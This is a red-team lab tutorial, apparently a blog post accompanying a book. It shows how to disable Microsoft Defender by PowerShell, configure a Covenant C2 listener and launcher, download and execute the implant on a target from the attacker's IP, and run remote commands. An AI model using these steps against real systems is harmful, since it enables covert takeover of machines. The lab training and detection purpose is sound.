Welcome back! In Part 1, we set up our Commando VM attack platform. Now in Part 2, we’ll get our hands dirty with a basic Command-and-Control (C2) scenario. We’ll walk through three main tasks step by step:
- Disabling Microsoft Defender on a Windows 10/11 target VM (to create a safe playground for C2 testing).
- Setting up a Covenant C2 listener and launcher on our Commando VM (acting as the attacker server).
- Transferring and running the launcher on the target will give us a Covenant “Grunt” session (remote agent).
After establishing a Grunt session, we’ll run a few simple commands (whoami, hostname, ipconfig) to verify we have control of the target. This guide assumes you’re an IT pro new to red teaming, so we’ll keep things simple with clear instructions and no unnecessary jargon. Let’s dive in!
1. Disabling Microsoft Defender on the Target VM
On your target Windows 10/11 VM, we need to turn off Microsoft Defender’s real-time protection temporarily. You wouldn’t normally have this ability in a real attack, but in our lab, we do this to prevent Defender from catching our simulated malware (the Covenant launcher). Only do this on your test VM!
There are two easy ways to disable real-time protection:
- Via Windows Security GUI:
Open Windows Security. Go to Virus & threat protection > Manage settings. Toggle Real-time protection to Off. (If it’s greyed out, turn off Tamper Protection first.) - Via PowerShell:
Open an elevated PowerShell (Run as Administrator) and run:
Set-MpPreference -DisableRealtimeMonitoring $true
Once Defender is paused, we’re good to move on.
2. Setting Up a Basic HTTP Listener and Launcher in Covenant
Now, let’s shift over to your Commando VM — your attacker box.
Step 2.1: Launch Covenant
Start Covenant on Commando VM and open the browser to access the dashboard (https://127.0.0.1:7443). Log in with your previously created credentials.
Step 2.2: Create an HTTP Listener
- Click Listeners on the left-hand menu.
- Hit Create.
- Use the following values:
- Name: Grunt001
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Port: 80
- Connect Address: (your Commando VM’s IP, e.g., 192.168.1.2)
- Http Profile: leave default
Note: To confirm its IP address, you can run ipconfig on your Commando VM.
Click Create. You should now see your Listener, Ignite, with a ” Running ” status.
Step 2.3: Generate the Binary Launcher
- Go to Launchers
- Select Binary
- Configure it:
- Listener: Grunt001
- Implant Template: Leave default
- Dot Net Version: Net40 (for most Windows 10/11 systems)
Click Generate, then download the .exe file (usually called GruntHTTP.exe). You can rename it testpayload.exe if you want—it’s totally up to you.
3. Transferring and Running the Launcher on the Target (Getting a Grunt)
Now, let’s simulate what an attacker would do next — deliver and run the payload.
Step 3.1: Transfer the File
Option 1 – Shared folder or drag-and-drop
Use your hypervisor’s shared folder setup or drag GruntHTTP.exe from Commando VM to your target VM’s Desktop or Public folder.
Option 2 – Host and download
If you want to host the payload with a web server, do this from Commando VM:
cd C:\Path\To\Payload
python -m http.server 8000
Then, from the target:
Invoke-WebRequest “http://192.168.1.2:8000/GruntHTTP.exe” -OutFile “C:\Users\Public\GruntHTTP.exe”
Step 3.2: Execute the Payload
On the target, run:
Start-Process “C:\Users\Public\GruntHTTP.exe”
Or double-click it.
The file runs silently in the background. Now, let’s check Covenant to see if it worked.
Step 3.3: Verify the Grunt in Covenant
Switch back to Commando VM → Covenant web interface → Click Grunts.
You should see a new active Grunt appear!
Here’s what it might look like:
Grunt Session Example:
- Grunt ID: GRUNT-ABC123
- Hostname: test001
- Username: John
- Integrity: High
- Check-in Time: Active
Boom. You’re in. You’ve got a Grunt session. This is your simulated backdoor — your command line on the victim.
4. Verifying Access with Simple Commands
Click on the Grunt’s name and hit Interact. This gives you a terminal-like interface where you can queue up commands.
Run the following one at a time:
whoami
This confirms who you’re running as on the victim:
test001\John
hostname
This confirms the machine name:
test001
ipconfig
Shows the IP address and network configuration of the target:
Ethernet adapter Ethernet:
IPv4 Address. . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Based on how frequently the Grunt checks in, each command might take a second or two to return. You can also run additional tasks like:
- ProcessList — see running processes
- ListDirectory — see files
- Screenshot — capture the screen
But for now, the goal is simple: prove access and demonstrate control.
You’ve done that.
What You Just Did (And Why It Matters)
You successfully:
- Disabled Defender on a lab machine
- Set up a working HTTP C2 listener
- Generated and deployed a payload
- Connected a Grunt session from the target to Commando VM
- Executed remote commands as a user named John on a host named test001
This is actual red team behavior, done safely in a lab.
You’re now thinking like an attacker. That means you can better defend your environment, tune alerts, and understand precisely how threat actors move inside networks.
Next Up
In Part 3, we’ll show how you can detect this activity using Microsoft Defender for Endpoint, Defender XDR, and Sentinel — flipping over to the blue team side of the house.
We’ll also look at basic persistence options using scheduled tasks to keep your Grunt alive after reboot.
Companion Guide
This post is part of our blog series supporting the book
“Red Teaming and Blue Teaming with Microsoft Defender XDR.”
The book is written as a hands-on training guide for IT Pros like you. If you’re enjoying this series, you’ll love the book’s full walkthroughs, diagrams, and advanced attack simulations.
Thanks for following along — and congrats on your first C2 session. More fun to come.
Let me know when you’re ready for Part 3!
John Sr.
